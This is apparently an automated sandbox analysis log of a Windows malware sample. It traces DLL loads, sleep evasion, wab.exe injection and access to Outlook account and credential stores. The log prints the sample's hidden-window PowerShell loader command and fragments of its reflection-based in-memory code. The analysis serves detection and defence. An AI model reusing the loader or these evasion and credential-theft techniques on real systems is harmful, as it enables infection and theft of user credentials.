              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: aflytningslov.lnk.0.drLNK file: ..\Desktop\Vmmeligt\manufakturhandlernes.Ter156
              Source: C:\Users\user\Desktop\87tBuE42ft.exeFile written: C:\Users\user\AppData\Local\Temp\Settings.iniJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: 87tBuE42ft.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbuZ source: powershell.exe, 00000001.00000002.2238813435.0000000007B8B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdbm source: powershell.exe, 00000001.00000002.2239197404.0000000007C03000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2238813435.0000000007B12000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5f source: powershell.exe, 00000001.00000002.2235356050.000000000337D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2238813435.0000000007B12000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ier:$DATA.pdb source: powershell.exe, 00000001.00000002.2238813435.0000000007B12000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 00000001.00000002.2241395545.000000000AB10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((hydatidinous $Duevejene $Liman), (Tilbagefring @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Chondriomere = [AppDomain]::CurrentDomain.GetAssemblies()$gl
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Symfonier)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Crippledom, $false).DefineType($Cynogenealogist
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $limpiness=Get-Content 'C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\ravnemorens\Frsteinstanserne\Instantiations.Lil';$Sears=$limpiness.SubString(55857,3);.$Sears($limpiness)
              Source: C:\Users\user\Desktop\87tBuE42ft.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $limpiness=Get-Content 'C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\ravnemorens\Frsteinstanserne\Instantiations.Lil';$Sears=$limpiness.SubString(55857,3);.$Sears($limpiness)Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,9_2_004044A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_22162806 push ecx; ret 7_2_22162819
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044693D push ecx; ret 9_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044DB70 push eax; ret 9_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044DB70 push eax; ret 9_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00451D54 push eax; ret 9_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044B090 push eax; ret 12_2_0044B0A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044B090 push eax; ret 12_2_0044B0CC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00444E71 push ecx; ret 12_2_00444E81
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00414060 push eax; ret 13_2_00414074
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00414060 push eax; ret 13_2_0041409C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00414039 push ecx; ret 13_2_00414049
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004164EB push 0000006Ah; retf 13_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00416553 push 0000006Ah; retf 13_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00416555 push 0000006Ah; retf 13_2_004165C4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\Cricotomy66\Refleksivs\87tBuE42ft.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_004047CB
              Source: C:\Users\user\Desktop\87tBuE42ft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,9_2_0040DD85
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6348Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3443Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 9408Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 1764Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.3 %
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3320Thread sleep time: -7378697629483816s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2208Thread sleep count: 234 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2208Thread sleep time: -117000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6128Thread sleep count: 83 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6128Thread sleep time: -249000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6128Thread sleep count: 9408 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6128Thread sleep time: -28224000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeCode function: 0_2_004069DF FindFirstFileW,FindClose,0_2_004069DF
              Source: C:\Users\user\Desktop\87tBuE42ft.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
              Source: C:\Users\user\Desktop\87tBuE42ft.exeCode function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D8E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_221610F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_221610F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040AE51 FindFirstFileW,FindNextFileW,9_2_0040AE51
